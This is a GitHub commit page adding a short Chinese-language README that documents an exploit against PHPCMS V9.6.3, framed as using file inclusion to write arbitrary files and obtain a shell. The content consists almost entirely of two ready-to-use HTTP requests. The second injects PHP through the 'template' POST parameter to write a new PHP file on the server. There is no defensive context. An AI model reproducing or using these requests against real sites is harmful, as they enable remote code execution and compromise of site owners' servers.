add phpcms 利用文件包含创建任意文件getshell

todd-tao · Mar 1, 2022 · 8292471 · 8292471
1 parent b9ae455
commit 8292471
Show file tree

Hide file tree

Showing 2 changed files with 22 additions and 0 deletions.
diff --git a/CMS/PHPcms/PHPCMS V9.6.3/README.md b/CMS/PHPcms/PHPCMS V9.6.3/README.md
@@ -0,0 +1,22 @@
+
+
+> 利用文件包含创建任意文件getshell
+
+
+## 利用过程
+1. 创建表
+```http request
+http://www.test.com/index.php?m=block&c=block_admin&pc_hash=123456&a=add&pos=1
+
+post 数据
+dosubmit=1&name=test&type=2
+```
+
+2. 写入phpinfo
+```http request
+http://www.test.com/index.php?m=block&c=block_admin&a=public_view&id=4
+
+post 数据
+template=<?php file_put_contents("phpinfo.php","<?php phpinfo();?>");
+```
+![phpinfo](images/phpinfo.png)
diff --git a/CMS/PHPcms/PHPCMS V9.6.3/images/phpinfo.png b/CMS/PHPcms/PHPCMS V9.6.3/images/phpinfo.png